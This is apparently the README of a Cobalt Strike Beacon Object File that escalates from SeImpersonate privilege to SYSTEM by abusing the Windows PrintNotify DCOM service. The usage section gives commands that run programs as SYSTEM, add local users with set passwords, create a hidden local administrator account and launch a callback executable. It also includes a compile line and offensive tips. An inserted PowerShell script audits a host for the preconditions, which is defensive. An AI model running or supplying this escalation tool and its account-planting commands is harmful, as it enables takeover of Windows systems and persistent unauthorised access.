
Cobalt Strike Beacon Object File (BOF) that obtains SYSTEM privilege with SeImpersonate privilege by passing a malicious IUnknown object to the DCOM call of PrintNotify.


Hagrid29/BOF-DCOMPotato-PrintNotify


BOF - DCOMPotato - PrintNotify

BOF version of DCOMPotato. Obtains SYSTEM privilege with SeImpersonate privilege by passing a malicious IUnknown object to the DCOM call of PrintNotify.

By default, the ImpersonationLevel of the PrintNotify service, which runs as SYSTEM, is set to RPC_C_IMP_LEVEL_IMPERSONATE:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\print
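
To review a host for the two preconditions named above, the following audit script reads the impersonation level from that key and lists which principals hold SeImpersonatePrivilege. It is an added example, not code from this repository; it assumes the level is stored as a DWORD value named ImpersonationLevel and that it is run from an elevated prompt.

```powershell
# Added audit example; not code from the BOF-DCOMPotato-PrintNotify repository.
# Run from an elevated PowerShell prompt on the host under review.

# RPC_C_IMP_LEVEL_* constants as defined in the Windows SDK.
$impLevels = @{ 0 = 'DEFAULT'; 1 = 'ANONYMOUS'; 2 = 'IDENTIFY'; 3 = 'IMPERSONATE'; 4 = 'DELEGATE' }

$key = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\print'
# Assumption: the level is stored as a DWORD value named ImpersonationLevel.
$props = Get-ItemProperty -Path $key -ErrorAction SilentlyContinue
if ($props -and ($props.PSObject.Properties.Name -contains 'ImpersonationLevel')) {
    $level = [int]$props.ImpersonationLevel
    $name = $impLevels[$level]
    if (-not $name) { $name = 'UNKNOWN' }
    $levelText = "$level (RPC_C_IMP_LEVEL_$name)"
} else {
    $levelText = 'key or value not present'
}
"Svchost\print ImpersonationLevel: $levelText"

# Export the local user-rights assignment and find the SeImpersonatePrivilege line.
$cfg = Join-Path $env:TEMP ('user_rights_{0}.inf' -f [guid]::NewGuid())
secedit.exe /export /areas USER_RIGHTS /cfg $cfg | Out-Null
$line = Get-Content -Path $cfg -ErrorAction SilentlyContinue |
    Where-Object { $_ -match '^\s*SeImpersonatePrivilege\s*=' } |
    Select-Object -First 1
Remove-Item -Path $cfg -Force -ErrorAction SilentlyContinue

if ($line) {
    foreach ($entry in ($line -split '=', 2)[1].Split(',')) {
        $entry = $entry.Trim()
        if ($entry.StartsWith('*')) {
            # Entries prefixed with * are SIDs; resolve them to account names where possible.
            $sid = New-Object System.Security.Principal.SecurityIdentifier($entry.TrimStart('*'))
            try { $account = $sid.Translate([System.Security.Principal.NTAccount]).Value }
            catch { $account = '(unresolved)' }
            [pscustomobject]@{ Right = 'SeImpersonatePrivilege'; Sid = $sid.Value; Account = $account }
        } else {
            # Entries without * are already account names.
            [pscustomobject]@{ Right = 'SeImpersonatePrivilege'; Sid = ''; Account = $entry }
        }
    }
} else {
    'SeImpersonatePrivilege: no assignment found in export'
}
```

Accounts in the output beyond the built-in service identities and Administrators are the ones worth reviewing, since any process running as them meets the privilege precondition.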

Usage

--pprog : program to launch. Default cmd.exe
--pargs : command line argument to pass to program. Default NULL
--pmode : create process call. 1 for CreateProcessWithTokenW. 2 for CreateProcessAsUser. 3 for NetUserAdd. Default 1

execute command with CreateProcessWithTokenW

DCOMPotato --pargs /c whoami /all > C:\temp\whoami.txt

execute command with CreateProcessAsUser

DCOMPotato --pargs /c net user hagrid P@ssw0rd /add --pmode 2

execute program with CreateProcessWithTokenW

DCOMPotato --pprog C:\temp\callback.exe

create local administrator account (hagrid\P@ss@29hagr!d) with NetUserAdd

DCOMPotato --pmode 3

Compile

cl /c /GS- /FoDCOMPotato.x64.o /TP DCOMPotato.cpp

Take Away

  • You cannot create a new object with C++ in Cobalt Strike when loading a BOF. You can use a struct to implement COM in C instead. Here is a guide
  • The == sign could be overloaded. It was overloaded as IsEqualGUID in my case
  • Using the flag LOGON_TYPE_NEW_CREDENTIALS with LogonUser can create a token that can be used for impersonation without providing valid credentials
  • According to the documentation, a process that calls CreateProcessAsUser requires the SE_INCREASE_QUOTA_NAME and SE_ASSIGNPRIMARYTOKEN_NAME privileges.
